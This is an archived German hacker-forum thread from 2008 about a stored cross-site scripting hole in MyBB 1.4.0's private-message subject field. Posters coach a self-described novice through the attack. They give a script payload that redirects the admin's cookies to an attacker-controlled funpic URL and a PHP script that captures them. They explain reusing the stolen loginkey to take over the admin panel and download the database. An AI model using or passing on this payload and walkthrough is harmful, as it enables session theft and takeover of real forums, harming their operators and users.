Willkommen im Archiv der Nunki-Crew!

Ein bummbastisches Erlebnis!
» Zurück zum Archivindex

Da unten siehst Du ein Thema aus der K-Under VIP oder Teamzone. Es mag älter sein, ist aber eventuell durchaus interessant - und Du hast nun das wahnsinnige Privileg, es Dir durchzulesen!

Ort: K-Underground / Papierkorb / VIP-Dump / MyBB 1.4.0 Exploit
Seiten (2): 1 2 Weiter »

XxAnimusxX
Unregistered

 
Danke:
Erhielt Danke in Beiträgen
Beitrag #1 |
MyBB 1.4.0 Exploit
Wheeeee, jeder der noch 1.4.0 auf der Platte hat sollte schnell updaten, denn es gibt da en schönen Exploit :D

Die Betreffzeile in einer PM wird nicht richtig geparst, d.h. man kann HTML einfügen.
Ein Script a la <script>document.location="meine.seite.de/?c="+document.cookie</script> kann da ganz schön viel ärger bereiten ^^

Aber pssssssst, das habt ihr nicht von mir ;)

IP-Adresse: Geloggt

25.08.2008 11:37
Diesen Beitrag bearbeiten
Phoenix
Unregistered

 
Danke:
Erhielt Danke in Beiträgen
Beitrag #2 |
RE: MyBB 1.4.0 Exploit
Duuu Chef? :o
Ich kann damit ja sonst nichts anfangen, kannst du mir das nicht beibringen? ^_^
Ich kann sonst nichts und will auch mal'n 1337-Kiddy sein =o

IP-Adresse: Geloggt

25.08.2008 11:39
Diesen Beitrag bearbeiten
XxAnimusxX
Unregistered

 
Danke:
Erhielt Danke in Beiträgen
Beitrag #3 |
RE: MyBB 1.4.0 Exploit
Suche in Google nach dem Begriff "MyBB 1.4" und versuche ein Board ausfindig zu machen, welches noch 1.4.0 drauf hat.
Nun meldeste dich dort an und schreibst am besten dem Admin mit den meisten Rechten eine PN und in den Betreff schreibste dann:

<script>document.location="http://deineseite.de.funpic.de?c="+document.cookie;</script>

Nun werden die Cookies vom Admin an deine Seite geschickt, wo du diese abspeicherst ($_GET["c"])
Du suchst dir nun in diesem Cookie den loginkey und kannst, wenn du diesen Loginkey mit deinem austauschst (musst hierfür in dein Cookies-Ordner, jenen finden der für das Board abgespeichert ist und den Loginkey mit dem des Admins austauschen) und nun die Seite besuchst biste der Admin und kannst so einiges an Schabernack treiben, z.B. ins AdminCP und ein DB-Backup ziehen :b

Die Erfahrung zeigt, das noch viele Leute 1.4.0 benutzen da das Upgrade auf 1.4.1 noch Probleme hat.

IP-Adresse: Geloggt

25.08.2008 11:43
Diesen Beitrag bearbeiten
Phoenix
Unregistered

 
Danke:
Erhielt Danke in Beiträgen
Beitrag #4 |
RE: MyBB 1.4.0 Exploit
Hakan schrieb:[...]an deine Seite geschickt[...]

Tja... welche Seite xD

IP-Adresse: Geloggt

25.08.2008 13:17
Diesen Beitrag bearbeiten
ganxTaa x3 Offline
{*&gt;~©‘©~&lt;*}
**

Beiträge: 66
Registriert seit: Jan 2007
Bewertung 93
Verwarnungslevel: 0%
Danke: 0
Erhielt 0 Danke in 0 Beiträgen
Beitrag #5 |
RE: MyBB 1.4.0 Exploit
Phoenix schrieb:
Hakan schrieb:[...]an deine Seite geschickt[...]

Tja... welche Seite xD

Meld dich z.B. bei Funpic an und lad folgendes PHP-Script auf deinen Server:
PHP-Code
<?

$cookie 
$_GET['c'];

echo 
$cookie;

?>

Dann passt du halt
Code:
<script>document.location="http://deineseite.de.funpic.de/datei.php?c="+document.cookie;</script>
auf deine Funpic-URL an ;)


Danke für den Tipp, Ani :)

IP-Adresse: Geloggt

25.08.2008 13:52
Eine E-Mail an den Benutzer sendenEine private Nachricht an den Benutzer sendenAlle Beiträge dieses Benutzers finden Diesen Beitrag bearbeiten
akurei
Unregistered

 
Danke:
Erhielt Danke in Beiträgen
Beitrag #6 |
RE: MyBB 1.4.0 Exploit
---

IP-Adresse: Geloggt

25.08.2008 15:03
Diesen Beitrag bearbeiten
Phoenix
Unregistered

 
Danke:
Erhielt Danke in Beiträgen
Beitrag #7 |
RE: MyBB 1.4.0 Exploit
Habe noch nie irgendwas in der Art gemacht ._.
Wo muss ich den PHP-Code denn einfügen?
Davon hab' ich soviel Ahnung wie von Chinesisch.

IP-Adresse: Geloggt

25.08.2008 15:07
Diesen Beitrag bearbeiten
akurei
Unregistered

 
Danke:
Erhielt Danke in Beiträgen
Beitrag #8 |
RE: MyBB 1.4.0 Exploit
---

IP-Adresse: Geloggt

25.08.2008 15:15
Diesen Beitrag bearbeiten
carbonat
Unregistered

 
Danke:
Erhielt Danke in Beiträgen
Beitrag #9 |
RE: MyBB 1.4.0 Exploit
akurei schrieb:Soweit ichs verstanden habe in die Betreffzeile der PM.

Aber man kann immer nur Daten auslesen, von der Seite, auf der man sich gerade befindet, oder?

Ja, den Cookie.. xD

damit kannste dich dann einloggen ^.^

IP-Adresse: Geloggt

25.08.2008 15:16
Diesen Beitrag bearbeiten
Phoenix
Unregistered

 
Danke:
Erhielt Danke in Beiträgen
Beitrag #10 |
RE: MyBB 1.4.0 Exploit
Ihr Pappnase :'(
Was erwartet ihr eigentlich von mir xD
Erbarme sich doch mal einer und glubscht bei Teamviewer hier rüber.

IP-Adresse: Geloggt

25.08.2008 15:20
Diesen Beitrag bearbeiten

Ort: K-Underground / Papierkorb / VIP-Dump / MyBB 1.4.0 Exploit
Seiten (2): 1 2 Weiter »

(C) Nunki-Crew // Nov 2011.